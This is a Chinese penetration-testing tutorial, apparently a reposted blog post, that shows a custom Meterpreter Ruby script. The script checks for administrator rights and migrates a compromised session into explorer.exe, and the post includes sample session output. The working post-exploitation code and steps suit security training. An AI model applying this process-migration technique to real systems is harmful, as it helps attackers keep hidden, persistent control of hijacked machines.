渗透之——Metasploit制作并运行自定义Meterpreper脚本(metasploit渗透教程)

网友投稿 341 2022-10-02


渗透之——Metasploit制作并运行自定义Meterpreper脚本(metasploit渗透教程)

注意:运行此脚本的前提是我们已经经过一系列的渗透,成功拿下了Meterpreter命令行。

这个脚本将会检查我们当前用户是否为管理员用户,然后找到explorer.exe进程,并自动迁移到这个进程中。

具体脚本mymet.rb如下:

### Author 冰河# Date 2019-01-14# Description Meterpreter脚本实例,检查 我们当前是否为管理员用户,然后找到exeplorer进程,并自动迁移到这个进程中##admin_check=is_admin?if(admin_check) print_good("Current User Is Admin")else print_error("Current User Is Not Admin")endsession.sys.process.get_processes().each do |x| if x['name'].downcase == "explorer.exe" print_good("Explorer.exe Process is Running with PID #{x['pid']}") explorer_ppid = x['pid'].to_i print_good("Migrating to Exeplorer.exe at PID #{explorer_ppid.to_s}") session.core.migrate(explorer_ppid) endend

接下来,我们将脚本mymet.rb上传到Kali的/usr/share/metasploit-framework/scripts/meterpreter目录下。

首先,我们现在Meterpreter上执行如下命令:

meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > meterpreter > getpidCurrent pid: 684meterpreter > psProcess List============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ----2208 2168 explorer.exe x64 1 liuyazhuang-PC\liuyazhuang C:\Windows\explorer.exe

可以看到当前的用户是管理员权限,当前session绑定的进程ID是684,explorer进程ID为2208

接下来我们在Meterpreter命令行下运行如下命令:

run myset

输出如下:

meterpreter > run mymet [+] Current User Is Admin[+] Explorer.exe Process is Running with PID 2208[+] Migrating to Exeplorer.exe at PID 2208

如下:

可以看到,命令成功运行

此时我们再次查看当前session绑定的PID

meterpreter > getpidCurrent pid: 2208

可以看到当前session已经绑定到explorer.exe进程了。


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:渗透之——使用Metasploit实现对缓冲区栈的溢出攻击(检测到基于堆栈的缓冲区溢出)
下一篇:详谈cxf和axis两种框架下的webservice客户端开发
相关文章

 发表评论

暂时没有评论,来抢沙发吧~